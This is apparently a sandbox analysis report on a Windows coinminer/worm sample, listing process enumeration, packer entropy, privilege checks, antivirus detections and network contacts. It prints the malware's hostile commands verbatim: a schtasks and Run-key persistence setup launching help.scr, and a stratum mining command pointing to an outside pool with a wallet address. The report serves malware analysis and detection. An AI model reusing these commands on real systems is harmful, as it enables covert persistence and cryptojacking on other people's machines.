Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x000012b4 process_name: inject-x86.exe process_identifier: 3496	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00000d78 process_name: cmd.exe process_identifier: 3512	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x000012b4 process_name: conhost.exe process_identifier: 3532	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00000334 process_name: inject-x86.exe process_identifier: 3544	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00000538 process_name: svchostromance.exe process_identifier: 3576	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x0000089c process_name: inject-x86.exe process_identifier: 3600	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x000012c0 process_name: cmd.exe process_identifier: 3616	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x000009a4 process_name: is32bit.exe process_identifier: 3624	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x000009fc process_name: conhost.exe process_identifier: 3640	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00000ec4 process_name: inject-x86.exe process_identifier: 3660	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x0000128c process_name: svchostromance.exe process_identifier: 3668	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x0000128c process_name: is32bit.exe process_identifier: 3676	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x0000087c process_name: inject-x86.exe process_identifier: 3708	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x000012c8 process_name: cmd.exe process_identifier: 3724	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x000012c8 process_name: conhost.exe process_identifier: 3732	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00000a84 process_name: is32bit.exe process_identifier: 3740	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00000cc4 process_name: svchostromance.exe process_identifier: 3768	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00000bf8 process_name: is32bit.exe process_identifier: 3776	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00000e84 process_name: inject-x86.exe process_identifier: 3796	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00000e84 process_name: inject-x86.exe process_identifier: 3804	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x000008a4 process_name: cmd.exe process_identifier: 3832	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00000864 process_name: is32bit.exe process_identifier: 3840	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x000008a4 process_name: conhost.exe process_identifier: 3856	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00000aa4 process_name: svchostromance.exe process_identifier: 3884	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00000aa4 process_name: inject-x86.exe process_identifier: 3904	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00000b04 process_name: inject-x86.exe process_identifier: 3928	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x000018c0 process_name: cmd.exe process_identifier: 3952	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x000018c0 process_name: conhost.exe process_identifier: 3960	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00001968 process_name: is32bit.exe process_identifier: 3972	1	1
Process32NextW June 14, 2024, 6:37 p.m.	snapshot_handle: 0x00001c0c process_name: svchostromance.exe process_identifier: 3984	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0053aa00', u'virtual_address': u'0x00397000', u'entropy': 7.933859471955468, u'name': u'.rsrc', u'virtual_size': u'0x0053a990'}

entropy

7.93385947196

description

A section with a high entropy has been found

entropy

0.58321533602

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 14, 2024, 6:36 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 14, 2024, 6:36 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (6 events)

cmdline	ipconfig /flushdns
cmdline	taskkill /f /im spreadTpqrst.exe
cmdline	cmd /c ipconfig /flushdns
cmdline	schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
cmdline	cmd /c taskkill /f /im spreadTpqrst.exe&&exit
cmdline	cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation June 14, 2024, 6:36 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (4 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic	reg_value	C:\Users\test22\AppData\Local\Temp\help.scr
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic	reg_value	C:\Users\test22\AppData\Local\Temp\help.scr
cmdline	schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
cmdline	cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW June 14, 2024, 6:36 p.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\ProgramData\WinRing0x64.sys service_name: WinRing0_1_2_0 filepath_r: C:\ProgramData\WinRing0x64.sys desired_access: 983551 service_handle: 0x0000000000464430 error_control: 1 service_type: 1 service_manager_handle: 0x0000000000464400	1	4604976	0

A stratum cryptocurrency mining command was executed (1 event)

cmdline

C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

Expresses interest in specific running processes (2 events)

process	spreadtpqrst.exe
process: potential process injection target	explorer.exe

Collects information on the system (ipconfig, netstat, systeminfo) (1 event)

cmdline

cmd /c ipconfig /flushdns

Detects VirtualBox through the presence of a device (1 event)

file	\??\VBoxMiniRdrDN

File has been identified by 63 AntiVirus engines on VirusTotal as malicious (50 out of 63 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Wofith.4!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
CAT-QuickHeal	Trojan.GenericPMF.S32268900
Skyhigh	BehavesLike.Win32.Generic.rc
McAfee	GenericRXSQ-GW!2D927FDB4625
Cylance	Unsafe
VIPRE	Gen:Variant.Mikey.113879
Sangfor	Trojan.Win32.Agent.Vn0h
K7AntiVirus	EmailWorm ( 00592c511 )
BitDefender	Gen:Variant.Mikey.113879
K7GW	EmailWorm ( 00592c511 )
Cybereason	malicious.b46257
Arcabit	Trojan.Mikey.D1BCD7
Symantec	W32.Coinminer!gen1
ESET-NOD32	a variant of Win32/Agent.OHX
APEX	Malicious
Avast	Win32:CoinminerX-gen [Trj]
ClamAV	Win.Malware.Mikey-9946342-0
Kaspersky	Trojan.Win32.Wofith.agu
Alibaba	Worm:Win32/Wofith.de9987da
NANO-Antivirus	Trojan.Win32.TrjGen.hlwdvf
MicroWorld-eScan	Gen:Variant.Mikey.113879
Rising	Trojan.SatanDDoS!1.D72A (CLASSIC)
Emsisoft	Gen:Variant.Mikey.113879 (B)
F-Secure	Trojan.TR/ATRAPS.Gen
DrWeb	Trojan.Siggen9.54646
Zillya	Worm.Agent.Win32.53571
TrendMicro	TROJ_GEN.R002C0DFB24
McAfeeD	ti!D4D451457C40
FireEye	Generic.mg.2d927fdb46257072
Sophos	Mal/Generic-S
Ikarus	Win32.Outbreak
Jiangmin	Trojan.Wofith.af
Google	Detected
Avira	TR/ATRAPS.Gen
MAX	malware (ai score=84)
Antiy-AVL	Trojan/Win32.Wofith
Kingsoft	Win32.Trojan.Wofith.agu
Gridinsoft	Trojan.Win32.CoinMiner.dd!s1
Xcitium	Backdoor.Win32.Rbot.~gen@1xtqdu
Microsoft	Trojan:Win32/Vindor!pz
ZoneAlarm	Trojan.Win32.Wofith.agu
GData	Win32.Application.Coinminer.J9YTCV
Varist	W32/Coinminer.GO.gen!Eldorado
AhnLab-V3	Trojan/Win32.ShadowBrokers.R340277
BitDefenderTheta	Gen:NN.ZexaF.36806.@JW@aetOS6nj
TACHYON	Trojan/W32.Wofith.9402368
DeepInstinct	MALICIOUS

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (17 events)

dead_host	192.168.56.103:50527
dead_host	192.168.56.103:50144
dead_host	192.168.56.103:49278
dead_host	192.168.56.103:49177
dead_host	192.168.56.1:19490
dead_host	192.168.56.103:49630
dead_host	192.168.56.1:21
dead_host	192.168.56.1:135
dead_host	192.168.56.101:1433
dead_host	192.168.56.103:50583
dead_host	192.168.56.103:49376
dead_host	192.168.56.103:50611
dead_host	192.168.56.103:49888
dead_host	192.168.56.101:21
dead_host	192.168.56.101:19490
dead_host	192.168.56.1:445
dead_host	192.168.56.1:1433

help.scr

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All